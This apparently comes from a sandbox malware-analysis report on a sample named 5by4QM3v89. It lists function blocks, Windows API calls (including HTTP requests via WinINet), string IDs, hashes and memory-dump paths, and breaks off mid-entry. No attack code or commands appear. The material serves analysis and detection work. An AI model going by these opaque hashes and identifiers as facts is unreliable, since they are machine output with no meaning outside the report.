                                                          • Instruction ID: f89c44b4f69c5a6638e4adb622ffd7e9d5ff96e712868936561c0f5bac4397a3
                                                          • Opcode Fuzzy Hash: ba716e968ddf962679a238590acfb28780638a9fe650ff83199b2aad99b6428f
                                                          • Instruction Fuzzy Hash: 95F01D32241558BBE7215BA29C0DEEB7A7CEBC6B11F004179FA04D1061DAA11A0686B9
                                                          APIs
                                                          • InterlockedExchange.KERNEL32(?,?), ref: 003F7243
                                                          • EnterCriticalSection.KERNEL32(?,?,003A0EE4,?,?), ref: 003F7254
                                                          • TerminateThread.KERNEL32(00000000,000001F6,?,003A0EE4,?,?), ref: 003F7261
                                                          • WaitForSingleObject.KERNEL32(00000000,000003E8,?,003A0EE4,?,?), ref: 003F726E
                                                            • Part of subcall function 003F6C35: CloseHandle.KERNEL32(00000000,?,003F727B,?,003A0EE4,?,?), ref: 003F6C3F
                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 003F7281
                                                          • LeaveCriticalSection.KERNEL32(?,?,003A0EE4,?,?), ref: 003F7288
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                          • String ID:
                                                          • API String ID: 3495660284-0
                                                          • Opcode ID: 57b999357958e2e695205864ad650f15645e381aeaaf3d2c7c146a8bca5943c3
                                                          • Instruction ID: 5e7fb011ab7483111e25e5ca4be25470a3b3ff40bd749ff823513df0556f2de4
                                                          • Opcode Fuzzy Hash: 57b999357958e2e695205864ad650f15645e381aeaaf3d2c7c146a8bca5943c3
                                                          • Instruction Fuzzy Hash: 19F0E236440A02EBD7121B24ED8C9EB373AFF44312B000672F603900A0CBB71806CB54
                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 003E899D
                                                          • UnloadUserProfile.USERENV(?,?), ref: 003E89A9
                                                          • CloseHandle.KERNEL32(?), ref: 003E89B2
                                                          • CloseHandle.KERNEL32(?), ref: 003E89BA
                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 003E89C3
                                                          • HeapFree.KERNEL32(00000000), ref: 003E89CA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                          • String ID:
                                                          • API String ID: 146765662-0
                                                          • Opcode ID: 7e850c3c1be3ac05df26fe6870d2ef8669c9c5eb93c58ba67219de126639a654
                                                          • Instruction ID: a9b8f9af70b8d24bf66fe94f7cce7b56be133f13f9d96e3c6800a03b32df49f3
                                                          • Opcode Fuzzy Hash: 7e850c3c1be3ac05df26fe6870d2ef8669c9c5eb93c58ba67219de126639a654
                                                          • Instruction Fuzzy Hash: 5AE0C936104805FBD6011FE1EC0C985BB69FB893227108230F62581070CB326826DB54
                                                          APIs
                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00422C7C,?), ref: 003E76EA
                                                          • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00422C7C,?), ref: 003E7702
                                                          • CLSIDFromProgID.OLE32(?,?,00000000,0041FB80,000000FF,?,00000000,00000800,00000000,?,00422C7C,?), ref: 003E7727
                                                          • _memcmp.LIBCMT ref: 003E7748
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: FromProg$FreeTask_memcmp
                                                          • String ID: ,,B
                                                          • API String ID: 314563124-1878338948
                                                          • Opcode ID: 6a838b5c7acdfbb0c3d7d22b6f2f8a309f95c332d45935664ce167bfcb45a245
                                                          • Instruction ID: f5233ccd6ada85a6d001ea356a3d82699b74ee9abb9796225ad54524ceda6edf
                                                          • Opcode Fuzzy Hash: 6a838b5c7acdfbb0c3d7d22b6f2f8a309f95c332d45935664ce167bfcb45a245
                                                          • Instruction Fuzzy Hash: A6813C71A00119EFCF01DFA5C984EEEB7B9FF89315F204558E505AB290DB71AE06CB60
                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 00408613
                                                          • CharUpperBuffW.USER32(?,?), ref: 00408722
                                                          • VariantClear.OLEAUT32(?), ref: 0040889A
                                                            • Part of subcall function 003F7562: VariantInit.OLEAUT32(00000000), ref: 003F75A2
                                                            • Part of subcall function 003F7562: VariantCopy.OLEAUT32(00000000,?), ref: 003F75AB
                                                            • Part of subcall function 003F7562: VariantClear.OLEAUT32(00000000), ref: 003F75B7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                          • API String ID: 4237274167-1221869570
                                                          • Opcode ID: 1deef8b6616dabea85f1ca8ea8fdd0ea23a16ffd350367fb2ba92bf90f189563
                                                          • Instruction ID: 45c13f5cd4f39262b5b01eb4ea73eafd1dedc8f73c65fe57d1a55b71f1223d09
                                                          • Opcode Fuzzy Hash: 1deef8b6616dabea85f1ca8ea8fdd0ea23a16ffd350367fb2ba92bf90f189563
                                                          • Instruction Fuzzy Hash: F5919E71608301DFCB10EF24C58196BB7E4EF89714F14892EF88A9B3A1DB35E946CB52
                                                          APIs
                                                            • Part of subcall function 003AFC86: _wcscpy.LIBCMT ref: 003AFCA9
                                                          • _memset.LIBCMT ref: 003F2B87
                                                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 003F2BB6
                                                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 003F2C69
                                                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 003F2C97
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                          • String ID: 0
                                                          • API String ID: 4152858687-4108050209
                                                          • Opcode ID: 337ff1bb4cb952e3079c8c6126d004a1aea7159744db65afb9c975a9f9f3dfb0
                                                          • Instruction ID: 80212e45651f44b7441e19c98a5cc5eb1ef7f34cfb53089ea56052235173c641
                                                          • Opcode Fuzzy Hash: 337ff1bb4cb952e3079c8c6126d004a1aea7159744db65afb9c975a9f9f3dfb0
                                                          • Instruction Fuzzy Hash: 1951CD71608308DED7269F28C845A7FB7E8EF89760F050A2DFA95D71A1DB74CC048B92
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: _memmove$_free
                                                          • String ID: 3c:$_:
                                                          • API String ID: 2620147621-3871541621
                                                          • Opcode ID: 2d843d97336d75fdfba16849551bc0e2dfa67c349669d6c6b1fb80f9735af46c
                                                          • Instruction ID: 5bb84d0e30d8df0b9eaea3be1764ef6b1d66a201c30a0f738f3479b919831adc
                                                          • Opcode Fuzzy Hash: 2d843d97336d75fdfba16849551bc0e2dfa67c349669d6c6b1fb80f9735af46c
                                                          • Instruction Fuzzy Hash: E7514A71A083418FDB2ACF29C541B6EBBE5EF8A314F05492DF99987351DB31E901CB82
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: _memset$_memmove
                                                          • String ID: 3c:$ERCP
                                                          • API String ID: 2532777613-911437667
                                                          • Opcode ID: 8309d223287fe621b1d3648993a2cbc61fce7fcf2afc5fe2ed87c34de6214f0d
                                                          • Instruction ID: f5ffa07a523b08ce848d2fd7fa5d92484aee6b49c4997fd077c032c8adcafa98
                                                          • Opcode Fuzzy Hash: 8309d223287fe621b1d3648993a2cbc61fce7fcf2afc5fe2ed87c34de6214f0d
                                                          • Instruction Fuzzy Hash: 3551AF70900705DBDB2ACF65C8827ABB7F8EF45314F24896EE54ACB690E770EA40CB50
                                                          APIs
                                                          • _memset.LIBCMT ref: 003F27C0
                                                          • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 003F27DC
                                                          • DeleteMenu.USER32(?,00000007,00000000), ref: 003F2822
                                                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00455890,00000000), ref: 003F286B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Menu$Delete$InfoItem_memset
                                                          • String ID: 0
                                                          • API String ID: 1173514356-4108050209
                                                          • Opcode ID: d62e7f1881652c0c62bc3e41604c441fc7fbd1cd9176adcced4ecc48521be657
                                                          • Instruction ID: 48724d1173b461deab560cd03d5aad914543d32778652fd3367b3cb1ab903cf1
                                                          • Opcode Fuzzy Hash: d62e7f1881652c0c62bc3e41604c441fc7fbd1cd9176adcced4ecc48521be657
                                                          • Instruction Fuzzy Hash: 7541C070204305DFDB22DF25C845B6BBBE8EF85354F05492DFA659B292D730A805CB52
                                                          APIs
                                                          • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0040D7C5
                                                            • Part of subcall function 0039784B: _memmove.LIBCMT ref: 00397899
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: BuffCharLower_memmove
                                                          • String ID: cdecl$none$stdcall$winapi
                                                          • API String ID: 3425801089-567219261
                                                          • Opcode ID: 9fcb496c80e28e90b7140f219e6954c8683e47d99455ebac28ffd4cc43ecd2ce
                                                          • Instruction ID: 8fdeddc24b951754cc2d2e9cdc4e8243f433b674ec24bacfa8a337f9a9358158
                                                          • Opcode Fuzzy Hash: 9fcb496c80e28e90b7140f219e6954c8683e47d99455ebac28ffd4cc43ecd2ce
                                                          • Instruction Fuzzy Hash: C931A271904219ABDF01EFA4CC519EFB3B5FF05320B108A2AE835AB6D1DB35A905CB84
                                                          APIs
                                                            • Part of subcall function 00397DE1: _memmove.LIBCMT ref: 00397E22
                                                            • Part of subcall function 003EAA99: GetClassNameW.USER32(?,?,000000FF), ref: 003EAABC
                                                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 003E8F14
                                                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 003E8F27
                                                          • SendMessageW.USER32(?,00000189,?,00000000), ref: 003E8F57
                                                            • Part of subcall function 00397BCC: _memmove.LIBCMT ref: 00397C06
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$_memmove$ClassName
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 365058703-1403004172
                                                          • Opcode ID: 67c9e17d3dfa4cc80a75f590467e8e7441dd0b5c1173d20d09499103b77ebc80
                                                          • Instruction ID: c4538429a9f1e83ce662fed04dbc406f9ee8171493d53b4636d81300e409e40e
                                                          • Opcode Fuzzy Hash: 67c9e17d3dfa4cc80a75f590467e8e7441dd0b5c1173d20d09499103b77ebc80
                                                          • Instruction Fuzzy Hash: 06210171A04204BEEF16ABB1EC85DFFB769DF05320B148629F4299B2E0DF39480A9610
                                                          APIs
                                                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0040184C
                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00401872
                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 004018A2
                                                          • InternetCloseHandle.WININET(00000000), ref: 004018E9
                                                            • Part of subcall function 00402483: GetLastError.KERNEL32(?,?,00401817,00000000,00000000,00000001), ref: 00402498
                                                            • Part of subcall function 00402483: SetEvent.KERNEL32(?,?,00401817,00000000,00000000,00000001), ref: 004024AD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                          • String ID:
                                                          • API String ID: 3113390036-3916222277
                                                          • Opcode ID: da056c70a7e163b51ba99abb0143eb87337cefd5b2b4e6cff7bdf779a594c264
                                                          • Instruction ID: 9634aa0fad748d0fc237920f426524a102e591f6e17ea564443f005daa6428ad
                                                          • Opcode Fuzzy Hash: da056c70a7e163b51ba99abb0143eb87337cefd5b2b4e6cff7bdf779a594c264
                                                          • Instruction Fuzzy Hash: 5521B3B25002087FEB11AF61CC85EBF77EDEB48754F10813BF505A6290DA788E0557A9
                                                          APIs
                                                            • Part of subcall function 00391D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00391D73
                                                            • Part of subcall function 00391D35: GetStockObject.GDI32(00000011), ref: 00391D87
                                                            • Part of subcall function 00391D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00391D91
                                                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00416461
                                                          • LoadLibraryW.KERNEL32(?), ref: 00416468
                                                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0041647D
                                                          • DestroyWindow.USER32(?), ref: 00416485
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                          • String ID: SysAnimate32
                                                          • API String ID: 4146253029-1011021900
                                                          • Opcode ID: e9b152dca795272c7abfde6399fafaa21866b5de0457c3dfd9263342c469b381
                                                          • Instruction ID: c287eecbdd0cc1e5594438a3af7fcde1d5c33214972fadfeda737167fd172053
                                                          • Opcode Fuzzy Hash: e9b152dca795272c7abfde6399fafaa21866b5de0457c3dfd9263342c469b381
                                                          • Instruction Fuzzy Hash: 19219F71100205BFEF108FA4DC40EFB37ADEB58328F11862AFA5492290D739DC829768
                                                          APIs
                                                          • GetStdHandle.KERNEL32(0000000C), ref: 003F6DBC
                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003F6DEF
                                                          • GetStdHandle.KERNEL32(0000000C), ref: 003F6E01
                                                          • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 003F6E3B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: CreateHandle$FilePipe
                                                          • String ID: nul
                                                          • API String ID: 4209266947-2873401336
                                                          • Opcode ID: 2da8a12e4a435a4118659195d8828538507c3319c0ee4e66eec1937704b17759
                                                          • Instruction ID: ef0fa09ff367811e89379ad901d20031ae460e6f5cb1ee789616261336beab1d
                                                          • Opcode Fuzzy Hash: 2da8a12e4a435a4118659195d8828538507c3319c0ee4e66eec1937704b17759
                                                          • Instruction Fuzzy Hash: 9D21D67560030DABDB219F29DC06AAA77F8FF54720F204629FEA1D72D0D7719815CB54
                                                          APIs
                                                          • GetStdHandle.KERNEL32(000000F6), ref: 003F6E89
                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003F6EBB
                                                          • GetStdHandle.KERNEL32(000000F6), ref: 003F6ECC
                                                          • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 003F6F06
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: CreateHandle$FilePipe
                                                          • String ID: nul
                                                          • API String ID: 4209266947-2873401336
                                                          • Opcode ID: daeaed5e9d27d0620c2e4748e970a8404fa7ea1ca3e836c945dd846f95799270
                                                          • Instruction ID: 3c943d62eb771c9d1f521e0dc31e24640d3ffc6db8dc6065ead1f860c39f32b7
                                                          • Opcode Fuzzy Hash: daeaed5e9d27d0620c2e4748e970a8404fa7ea1ca3e836c945dd846f95799270
                                                          • Instruction Fuzzy Hash: 1921C47A6003099BDB219F69DD06ABA77A8EF65730F204B29FEE0D72D0D7719841CB10
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 003FAC54
                                                          • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 003FACA8
                                                          • __swprintf.LIBCMT ref: 003FACC1
                                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000,0041F910), ref: 003FACFF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$InformationVolume__swprintf
                                                          • String ID: %lu
                                                          • API String ID: 3164766367-685833217
                                                          • Opcode ID: 75c345c275ad33aa90e7be6831c6e8dd26f7a6a3ec15eba1b346731ebb3ab1d9
                                                          • Instruction ID: 0963a02d6319e193dc1ba61f776be17b15bbc85f15b5586c9e7656b1025d98d5
                                                          • Opcode Fuzzy Hash: 75c345c275ad33aa90e7be6831c6e8dd26f7a6a3ec15eba1b346731ebb3ab1d9
                                                          • Instruction Fuzzy Hash: 24218370A00109AFCB11DF69C945EEE7BB8EF49314B104069F909DB251DB31EE45DB61
                                                          APIs
                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,003EFCED,?,003F0D40,?,00008000), ref: 003F115F
                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,003EFCED,?,003F0D40,?,00008000), ref: 003F1184
                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,003EFCED,?,003F0D40,?,00008000), ref: 003F118E
                                                          • Sleep.KERNEL32(?,?,?,?,?,?,?,003EFCED,?,003F0D40,?,00008000), ref: 003F11C1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: CounterPerformanceQuerySleep
                                                          • String ID: @?
                                                          • API String ID: 2875609808-2350057378
                                                          • Opcode ID: 83b9280dd7b981317dcf6c8cdf86f60725ba43898fdc681f2a57f767f5476d8d
                                                          • Instruction ID: d69d61d63031bf1829c9dd652031ebe57f4bd2423d3f6b110ceb3960558262af
